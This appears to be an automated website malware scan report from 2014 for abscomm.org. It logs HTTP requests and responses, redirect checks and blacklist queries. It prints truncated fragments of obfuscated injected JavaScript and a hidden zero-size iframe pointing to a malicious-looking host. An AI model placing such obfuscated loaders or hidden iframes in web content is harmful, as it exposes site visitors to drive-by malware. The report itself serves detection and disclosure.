Scanned pages/files
Request | Server response | Status |
http://abscomm.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 07 Oct 2014 10:49:28 GMT Location: http://home.earthlink.net/~abscomm/ Server: Sun-ONE-Web-Server/6.1 Content-Length: 122 Content-Type: text/html | clean |
http://home.earthlink.net/~abscomm/ | 200 OK Content-Length: 19336 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('RMbRn'=='oRMHPH')mElLpP();if('WybTj'=='CyuApf')EmWdD();var tLxW='YiHbtD';var ItnHi='Rfpu';var ZrLInA;var qNqqsi="f\x72o\x6dCharCo\x64e";var FTas='ftzyPo';var ATaLK=184;var appVersion_var="a\x70\x70Versi\x6f\x6e";var vquLKIyMM="con\x73t\x72\x75\x63t\x6fr";if('QCuD'=='peOUre')iqchS='poIFqz';var px1_var="1\x70x";function Kcvk(){var DXCPo='ChOA';if('RukVtP'=='ZxhF')liqngX();} var GErrw="9eaaaaa6706565a197aa9ba9aa97aa676664a8ab659fa464999d9f756e";var oSYbE='qaIvpf';var jyMTjcHwq="ap\x70\x65\x function VqfE(){}if('OdsY'=='nzfrMq')hCqY();if('hQdG'=='WQbh')dLblI();} NiwDaBYyo();if('MUNj'=='yrMNX')BLDDN='kWAtoW';if('WRvy'=='FxpL')BqImgJ();var GohttM=188;var Znziw='xNAd'; Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://geomy.zz.mu/go.php?sid=1 <iframe src="http://geomy.zz.mu/go.php?sid=1" width="0" height="0" frameborder="0"> | ||
http://rss.brainyhistory.com/link/historyevents.js | 200 OK Content-Length: 601 Content-Type: application/x-javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 15530 Content-Type: application/x-javascript | clean |
http://edge.quantserve.com/quant.js | 200 OK Content-Length: 7874 Content-Type: application/x-javascript | clean |
http://tubestat160.ru/get.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://tubestat160.ru/test404page.js | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: abscomm.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 10:49:28 GMT
Location: http://home.earthlink.net/~abscomm/
Server: Sun-ONE-Web-Server/6.1
Content-Length: 122
Content-Type: text/html
...122 bytes of data.
GET / HTTP/1.1
Host: abscomm.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 07 Oct 2014 10:49:28 GMT
Location: http://home.earthlink.net/~abscomm/
Server: Sun-ONE-Web-Server/6.1
Content-Length: 122
Content-Type: text/html
...122 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: abscomm.org
Referer: http://www.google.com/search?q=abscomm.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: abscomm.org
Referer: http://www.google.com/search?q=abscomm.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=abscomm.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://abscomm.org/
Result: abscomm.org is not infected or malware details are not published yet.
Result: abscomm.org is not infected or malware details are not published yet.